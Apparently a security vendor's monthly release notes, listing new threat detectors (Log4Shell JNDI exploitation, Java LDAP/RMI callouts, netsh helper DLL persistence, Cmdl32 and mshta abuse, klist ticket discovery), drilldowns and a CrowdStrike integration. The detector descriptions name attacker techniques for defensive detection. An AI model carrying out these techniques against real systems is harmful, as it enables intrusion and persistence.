This page contains information about new content released in the last month, and improvements and bug fixes to existing content.
This information, and information about all existing content, can also be found in the Knowledge Center in the Hunters portal.

Category

Name

Description

Prerequisites

Where it can be found

Detector

Suspected Log4Shell Exploitation - EDR

This detector detects Log4Shell exploitation attempt followed up by an outgoing connection to the attacker's domain/IP detailed in the JNDI lookup string observed in EDR logs

  • EDR logs

  • Web requests logs

Leads page - Enterprise Network leads.

Detector

Suspected Log4Shell Exploitation - Network Traffic

This detector detects Log4Shell exploitation attempt followed up by an outgoing connection to the attacker's IP detailed in the JNDI lookup string observed in non-EDR network events

  • Network traffic logs

  • Web requests logs

Leads page - Enterprise Network leads.

Detector

Rare LDAP or RMI Connection to External Server

Detects access in LDAP, LDAPS or RMI to a rarely seen external IP address.
This behavior can indicate an exploitation of the CVE-2021-44228 ("Log4Shell") vulnerability.

  • Network traffic logs

Leads page - Enterprise Network leads.

Detector

LDAP or RMI Connection to External Server by Java Process

Detects access in LDAP, LDAPS or RMI ports to external IP address from a Java process.
This behavior can indicate an exploitation of the CVE-2021-44228 ("Log4Shell") vulnerability.

  • EDR logs

Leads page - Enterprise Network leads.

Drilldown

Email Address Statistics

Statistics for the Email address, including the number of emails sent and received, and the prevalence of the email sender over time.

  • Raw Email logs

Under the Employee Entity - If an Email address is found.

For Email detectors - Under the Mailbox Entity.

Drilldown

Last Emails Sent

Last emails sent by email address.

We currently search for emails one day back.

  • Raw Email logs

In Email detectors - under the Sender Mailbox Entity.

Drilldown

Last Okta Sessions for Email

User sessions in Okta which match a given Email address (which correlates to an Okta user).

Sessions include information such as start and end times, the number of events in the session, IPs and User-Agents used in the sessions.

We currently search for Okta sessions in the last 7 days.

  • Okta logs

Under the Employee Entity - If an Email address is found.

For Okta detectors - under the Okta User Entity.

Detector

Netsh Helper DLL Added

Detects executions of the "netsh add helper" command.
Threat actors often use this command to establish persistence on a victim's machine.

https://attack.mitre.org/techniques/T1546/007/

  • EDR logs

Leads page - Enterprise Network leads.

Detector

Malicious Cmdl32 Execution

Detects execution of Cmdl32.exe - a system binary associated with Microsoft Connection Manager Auto-Download.
Threat actors may use this binary in order to download suspicious payloads and evade detection.

https://attack.mitre.org/techniques/T1105/

  • EDR logs

Leads page - Enterprise Network leads.

SOC Queue - for leads scored 80 and above.

Detector

Suspicious .hta File Execution

Mshta is a windows utility for executing Microsoft HTML Application (HTA) files. It can also execute JavaScript and VBScript directly from the commandline.
Threat actors commonly use this binary in various stages of an attack in order to proxy the execution of arbitrary code through a trusted utility.

https://attack.mitre.org/techniques/T1218/005/

  • EDR logs

Leads page - Enterprise Network leads.

Detector

Kerberos Tickets Discovery Using klist.exe

Detects klist.exe execution ('purge' flag excluded).
Threat actors often use klist.exe to discover cached Kerberos tickets before operating Kerberos ticket attacks (Kerberoasting, DCSync, Pass-the-ticket, etc.)

https://attack.mitre.org/techniques/T1558/

  • EDR logs

Leads page - Enterprise Network leads.

Drilldown

EDR File Path Info

Returns all details of a specific file on a specific EDR agent, and all activity performed on it, such as processes that created or modified it.

  • EDR logs

This drilldown will appear under the File entity in every lead that has such an entity.

Dataflow

CrowdStrike Devices

A new integration based on the CrowdStrike Host Management API.

This enables Hunters to ingest and utilize all data about CS agents, such as hostnames, network details, OS details, etc.

To enable this feature, upgrade the Hunters SOC app in the CrowdStrike store.

The data will appear as a new table in your Snowflake database.

It will also be used in various correlation features in the product.

Improvements and Bug Fixes

  • Hunters now receives all raw events from CrowdStrike agents using the CrowdStrike store integration, instead of the limited list received until now. To enable this, please upgrade the Hunters SOC app in the CrowdStrike store.

  • The Drilldown “G Suite Activity Statistics” will now appear under the “Employee” Entity for G Suite detectors.

  • The “Host Owner” entity will now appear for all EDR leads, when a primary user was found for the relevant host.

  • A “File” entity will now be extracted from the process commandline and appear in EDR detectors such as “Suspicious .hta File Execution”, “Suspicious Execution from %ProgramData%” and more.

  • Improved regex and conditions for “Use of Kali Linux” detector.

  • Improved allow list for “PowerShell Outgoing Connection with New Commandline” detector - removed internal IPv6 addresses and common known domains.

  • Added support for Entities for Carbon Black Alerts when Carbon Black raw data does not exist.

  • Improved conditions for the detector “CloudTrail Logging Disruption”.